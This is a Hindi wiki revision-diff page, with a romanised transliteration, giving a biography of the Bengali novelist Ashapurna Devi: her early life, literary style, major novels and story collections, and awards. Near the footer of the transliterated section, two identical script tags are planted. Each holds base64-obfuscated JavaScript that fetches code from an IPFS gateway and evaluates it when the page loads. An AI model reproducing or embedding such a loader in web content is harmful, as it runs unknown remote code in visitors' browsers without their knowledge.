Difference between revisions of "आशापूर्णा देवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 32: Line 32:
 
|अद्यतन={{अद्यतन|18:59, 23 मार्च 2012 (IST)}}
 
|अद्यतन={{अद्यतन|18:59, 23 मार्च 2012 (IST)}}
 
}}
 
}}
'''आशापूर्णा देवी''' (जन्म: [[8 जनवरी]] [[1909]] [[कलकत्ता]] (वर्तमान [[कोलकाता]]); मृत्यु: [[13 जुलाई]] [[1995]]) [[बांग्ला भाषा]] की प्रख्‍यात [[उपन्यासकार]] हैं जिन्होंने मात्र 13 वर्ष की आयु में लिखना प्रारंभ कर दिया था और तब से ही उनकी लेखनी निरंतर सक्रिय बनी रही।  
+
'''आशापूर्णा देवी''' (जन्म: [[8 जनवरी]] [[1909]] [[कलकत्ता]] (वर्तमान [[कोलकाता]]); मृत्यु: [[13 जुलाई]] [[1995]]) [[बांग्ला भाषा]] की प्रख्‍यात [[उपन्यासकार]] हैं जिन्होंने मात्र 13 [[वर्ष]] की आयु में लिखना प्रारंभ कर दिया था और तब से ही उनकी लेखनी निरंतर सक्रिय बनी रही।  
  
 
==आरंभिक जीवन==
 
==आरंभिक जीवन==
वह एक मध्‍यवर्गीय परिवार से थीं, पर स्‍कूल-कॉलज जाने का सुअवसर उन्‍हे कभी नहीं मिला। उनके परिवेश में उन सभी निषेधों का बोलबाला था, जो उस [[युग]] के [[अखण्डित बंगाल|बंगाल]] को आक्रांत किए हुए था, लेकिन पढ़ने, गुनने और अपने विचार व्‍यक्‍त करने की भरपूर सुविधाएं उन्‍हें शुरू से मिलती रहीं। उनके पिता कुशल चित्रकार थे, मां बांग्‍ला साहित्‍य की अनन्‍य प्रेमी और तीनों भाई कॉलेज के छात्र थे। ज़ाहिर है, उस समय के जाने-माने साहित्‍यकारों और कला शिल्‍पियों को निकट से देखने-जानने के अवसर आशापूर्णा को आए दिन मिलते रहे। ऐसे परिवेश में उनके मानस का ही नहीं, कला चेतना और संवेदनशीलता का भी भरपूर विकास हुआ। भले ही पिता के घर और फिर पति के घर भी पर्दे आदि के बंधन बराबर रहे, पर कभी घर के किसी झरोखे से भी यदि बाहर के संसार की झलक मिल गई, तो उनका सजग मन उधर के समूचे घटनाचक्र की कल्‍पना कर लेता। इस प्रकार देश का स्‍वतंत्रता संघर्ष, [[असहयोग आंदोलन]], [[राजनीति]] के क्षेत्र में नारी का पर्दापण और फिर पुरुष वर्ग की बराबरी में दायित्‍वों का निर्वाह, सब कुछ उनकी चेतना पर अंकित हुआ।  
+
वह एक मध्‍यवर्गीय परिवार से थीं, पर स्‍कूल-कॉलेज जाने का सुअवसर उन्‍हें कभी नहीं मिला। उनके परिवेश में उन सभी निषेधों का बोलबाला था, जो उस [[युग]] के [[अखण्डित बंगाल|बंगाल]] को आक्रांत किए हुए थे, लेकिन पढ़ने, गुनने और अपने विचार व्‍यक्‍त करने की भरपूर सुविधाएं उन्‍हें शुरू से मिलती रहीं। उनके [[पिता]] कुशल [[चित्रकार]] थे, मां बांग्‍ला साहित्‍य की अनन्‍य प्रेमी और तीनों भाई कॉलेज के छात्र थे। ज़ाहिर है, उस समय के जाने-माने साहित्‍यकारों और कला शिल्‍पियों को निकट से देखने-जानने के अवसर आशापूर्णा को आए दिन मिलते रहे। ऐसे परिवेश में उनके मानस का ही नहीं, कला चेतना और संवेदनशीलता का भी भरपूर विकास हुआ। भले ही पिता के घर और फिर पति के घर भी पर्दे आदि के बंधन बराबर रहे, पर कभी घर के किसी झरोखे से भी यदि बाहर के संसार की झलक मिल गई, तो उनका सजग मन उधर के समूचे घटनाचक्र की कल्‍पना कर लेता। इस प्रकार देश के स्‍वतंत्रता संघर्ष, [[असहयोग आंदोलन]], [[राजनीति]] के क्षेत्र में नारी का पर्दापण और फिर पुरुष वर्ग की बराबरी में दायित्‍वों का निर्वाह, सब कुछ उनकी चेतना पर अंकित हुआ।  
 
==साहित्यिक परिचय==
 
==साहित्यिक परिचय==
अपनी प्रतिभा के कारण उन्‍हे समकालीन बांग्‍ला उपन्‍यासकारों की प्रथम पंक्‍ति में गौरवपूर्ण स्‍थान मिला। उनके विपुल कृतित्‍व का उदाहरण उनकी लगभग 225 कृतियां हैं, जिनमें 100 से अधिक उपन्‍यास हैं। आशापूर्णा देवी की सफलता का रहस्‍य बहुत कुछ उनके शिल्‍प-कौशल में है, जो नितांत स्‍वाभाविक होने के साथ-साथ अद्भुत रूप से दक्ष है. उनकी यथार्थवादिता, शब्‍दों की मितव्‍ययिता, सहज सुंतुलित मुद्रा और बात ज्‍यों की त्‍यों कह देने की क्षमता ने उन्‍हे और भी विशिष्‍ट बना दिया। अनकी अवलोकन शक्‍ति न केवल पैनी और अंतर्गामी थी, बल्‍कि आसपास के सारे ब्‍योरों को भी अपने में समेट लाती थीं। मानव के प्रति आशापूर्णा का दृष्‍टिकोण किसी विचारधारा या पूर्वग्रह से ग्रस्‍त नहीं था। किसी घृण्‍य चरित्र का रेखाकंन करते समय उनके मन में कोई कड़वाहट नहीं थी, वह मूलत: मानवप्रेमी थी। उनकी रचनागत सशक्‍तता का स्रोत परानुभूति और मानवजाति के प्रति हार्दिक संवेदना थी। आशापूर्णा विद्रोहिणी थीं। उनका विद्रोह रूढ़ि, बंधनों, जर्जर पूर्वग्रहों, समाज की अर्थहीन परंपराओं और उन अवमाननाओं से था, जो नारी पर पुरुष वर्ग, स्‍वयं नारियों और समाज व्‍यवस्‍था द्वारा लादी गई थीं। उनकी उपन्‍यास-त्रयी, प्रथम प्रतिश्रुति, सुवर्णलता और बकुलकथा की रचना ही उनके इस सघन विद्रोह भाव को मूर्त और मुखरित करने के लिए हुईं।  
+
अपनी प्रतिभा के कारण उन्‍हें समकालीन बांग्‍ला उपन्‍यासकारों की प्रथम पंक्‍ति में गौरवपूर्ण स्‍थान मिला। उनके विपुल कृतित्‍व का उदाहरण उनकी लगभग 225 कृतियां हैं, जिनमें 100 से अधिक उपन्‍यास हैं। आशापूर्णा देवी की सफलता का रहस्‍य बहुत कुछ उनके शिल्‍प-कौशल में है, जो नितांत स्‍वाभाविक होने के साथ-साथ अद्भुत रूप से दक्ष है। उनकी यथार्थवादिता, शब्‍दों की मितव्‍ययिता, सहज संतुलित मुद्रा और बात ज्‍यों की त्‍यों कह देने की क्षमता ने उन्‍हें और भी विशिष्‍ट बना दिया। उनकी अवलोकन शक्‍ति न केवल पैनी और अंतर्गामी थी, बल्‍कि आसपास के सारे ब्‍योरों को भी अपने में समेट लाती थीं। मानव के प्रति आशापूर्णा का दृष्‍टिकोण किसी विचारधारा या पूर्वग्रह से ग्रस्‍त नहीं था। किसी घृण्‍य चरित्र का रेखाकंन करते समय उनके मन में कोई कड़वाहट नहीं थी, वह मूलत: मानवप्रेमी थी। उनकी रचनागत सशक्‍तता का स्रोत परानुभूति और मानवजाति के प्रति हार्दिक संवेदना थी। आशापूर्णा विद्रोहिणी थीं। उनका विद्रोह रूढ़ि, बंधनों, जर्जर पूर्वग्रहों, समाज की अर्थहीन परंपराओं और उन अवमाननाओं से था, जो नारी पर पुरुष वर्ग, स्‍वयं नारियों और समाज व्‍यवस्‍था द्वारा लादी गई थीं। उनकी उपन्‍यास-त्रयी, प्रथम प्रतिश्रुति, सुवर्णलता और बकुलकथा की रचना ही उनके इस सघन विद्रोह भाव को मूर्त और मुखरित करने के लिए हुईं।  
 
;शैली  
 
;शैली  
 
आशापूर्णा के लेखन की विशिष्‍टता उनकी एक अपनी ही शैली है। कथा का विकास, चरित्रों का रेखाकंन, पात्रों के मनोभावों से अवगत कराना, सबमें वह यथार्थवादिता को बनाए रखते हुए अपनी आशामयी दृष्‍टि को अभिव्‍यक्‍ति देती हैं। इसके पीछे उनकी शैली विद्यमान रहती है।  
 
आशापूर्णा के लेखन की विशिष्‍टता उनकी एक अपनी ही शैली है। कथा का विकास, चरित्रों का रेखाकंन, पात्रों के मनोभावों से अवगत कराना, सबमें वह यथार्थवादिता को बनाए रखते हुए अपनी आशामयी दृष्‍टि को अभिव्‍यक्‍ति देती हैं। इसके पीछे उनकी शैली विद्यमान रहती है।  

Revision as of 06:23, 14 July 2013

ashapoorna devi
poora nam ashapoorna devi
janm 8 janavari, 1909
janm bhoomi kalakatta[1], pashchim bangal
mrityu 13 julaee, 1995
karm bhoomi pashchim bangal
karm-kshetr sahity
mukhy rachanaean pratham pratishruti (1964), akash mati (1975), prem o prayojan (1944) adi
bhasha baangla
puraskar-upadhi taigor purash‍kar (1964), lila purash‍kar, padmashri (1976) aur jnanapith puraskar (1976)
prasiddhi baangh‍la upanh‍yasakar
nagarikata bharatiy
adyatan‎
inhean bhi dekhean kavi soochi, sahityakar soochi

ashapoorna devi (janm: 8 janavari 1909 kalakatta (vartaman kolakata); mrityu: 13 julaee 1995) baangla bhasha ki prakhh‍yat upanyasakar haian jinhoanne matr 13 varsh ki ayu mean likhana praranbh kar diya tha aur tab se hi unaki lekhani nirantar sakriy bani rahi.

aranbhik jivan

vah ek madhh‍yavargiy parivar se thian, par sh‍kool-k aaulej jane ka suavasar unh‍hean kabhi nahian mila. unake parivesh mean un sabhi nishedhoan ka bolabala tha, jo us yug ke bangal ko akraant kie hue the, lekin padhane, gunane aur apane vichar vh‍yakh‍t karane ki bharapoor suvidhaean unh‍hean shuroo se milati rahian. unake pita kushal chitrakar the, maan baangh‍la sahith‍y ki ananh‍y premi aur tinoan bhaee k aaulej ke chhatr the. zahir hai, us samay ke jane-mane sahith‍yakaroan aur kala shilh‍piyoan ko nikat se dekhane-janane ke avasar ashapoorna ko ae din milate rahe. aise parivesh mean unake manas ka hi nahian, kala chetana aur sanvedanashilata ka bhi bharapoor vikas hua. bhale hi pita ke ghar aur phir pati ke ghar bhi parde adi ke bandhan barabar rahe, par kabhi ghar ke kisi jharokhe se bhi yadi bahar ke sansar ki jhalak mil gee, to unaka sajag man udhar ke samooche ghatanachakr ki kalh‍pana kar leta. is prakar desh ke sh‍vatantrata sangharsh, asahayog aandolan, rajaniti ke kshetr mean nari ka pardapan aur phir purush varg ki barabari mean dayith‍voan ka nirvah, sab kuchh unaki chetana par aankit hua.

sahityik parichay

apani pratibha ke karan unh‍hean samakalin baangh‍la upanh‍yasakaroan ki pratham pankh‍ti mean gauravapoorn sh‍than mila. unake vipul kritith‍v ka udaharan unaki lagabhag 225 kritiyaan haian, jinamean 100 se adhik upanh‍yas haian. ashapoorna devi ki saphalata ka rahash‍y bahut kuchh unake shilh‍p-kaushal mean hai, jo nitaant sh‍vabhavik hone ke sath-sath adbhut roop se daksh hai. unaki yatharthavadita, shabh‍doan ki mitavh‍yayita, sahaj santulit mudra aur bat jh‍yoan ki th‍yoan kah dene ki kshamata ne unh‍hean aur bhi vishishh‍t bana diya. unaki avalokan shakh‍ti n keval paini aur aantargami thi, balh‍ki asapas ke sare bh‍yoroan ko bhi apane mean samet lati thian. manav ke prati ashapoorna ka drishh‍tikon kisi vicharadhara ya poorvagrah se grash‍t nahian tha. kisi ghrinh‍y charitr ka rekhakann karate samay unake man mean koee k davahat nahian thi, vah moolat: manavapremi thi. unaki rachanagat sashakh‍tata ka srot paranubhooti aur manavajati ke prati hardik sanvedana thi. ashapoorna vidrohini thian. unaka vidroh roodhi, bandhanoan, jarjar poorvagrahoan, samaj ki arthahin paranparaoan aur un avamananaoan se tha, jo nari par purush varg, sh‍vayan nariyoan aur samaj vh‍yavash‍tha dvara ladi gee thian. unaki upanh‍yas-trayi, pratham pratishruti, suvarnalata aur bakulakatha ki rachana hi unake is saghan vidroh bhav ko moort aur mukharit karane ke lie hueean.

shaili

ashapoorna ke lekhan ki vishishh‍tata unaki ek apani hi shaili hai. katha ka vikas, charitroan ka rekhakann, patroan ke manobhavoan se avagat karana, sabamean vah yatharthavadita ko banae rakhate hue apani ashamayi drishh‍ti ko abhivh‍yakh‍ti deti haian. isake pichhe unaki shaili vidyaman rahati hai.

pramukh kritiyaan

upanh‍yas-
  • prem o prayojan (1944)
  • agh‍ni-pariksha (1952)
  • chha dapatr (1959)
  • pratham pratishruti (1964)
  • suvarnalata (1966)
  • mayadarpan (1966)
  • bakul katha (1974)
  • uth‍tarapuroosh (1976)
  • jugaantar yavanika pare (1978)
kahani-
  • jal aur agun (1940)
  • ar ek din (1955)
  • sonali sandhh‍ya (1962)
  • akash mati (1975)
  • ek akash anek tara (1977)

samman aur puraskar

ashapoorna devi ko taigor purash‍kar (1964), lila purash‍kar, padmashri (1976) aur jnanapith puraskar (1976) se samh‍manit kiya gaya.

nidhan

prakhyat upanyasakar ashapoorna devi ka nidhan 13 julaee, 1995 ko hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. (vartaman kolakata)

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>